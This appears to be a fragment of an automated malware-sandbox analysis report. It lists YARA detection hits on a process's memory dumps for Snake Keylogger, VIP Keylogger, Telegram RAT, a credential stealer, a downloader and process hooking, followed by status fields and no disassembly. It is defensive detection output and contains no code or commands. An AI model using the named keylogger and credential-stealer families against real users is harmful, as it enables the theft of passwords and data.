                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000002.33968896009.0000000003374000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_TelegramRAT, Description: Yara detected Telegram RAT, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_VIPKeylogger, Description: Yara detected VIP Keylogger, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: JoeSecurity_GenericDownloader_1, Description: Yara detected Generic Downloader, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                                                                                  • Rule: INDICATOR_SUSPICIOUS_EXE_DotNetProcHook, Description: Detects executables with potential process hoocking, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: ditekSHen
                                                                                                                                                                                  • Rule: MAL_Envrial_Jan18_1, Description: Detects Encrial credential stealer malware, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth
                                                                                                                                                                                  • Rule: Windows_Trojan_SnakeKeylogger_af3faa65, Description: unknown, Source: 00000008.00000003.31559183380.0000000003259000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
                                                                                                                                                                                  Reputation:moderate
                                                                                                                                                                                  Has exited:false

                                                                                                                                                                                  Disassembly

                                                                                                                                                                                  No disassembly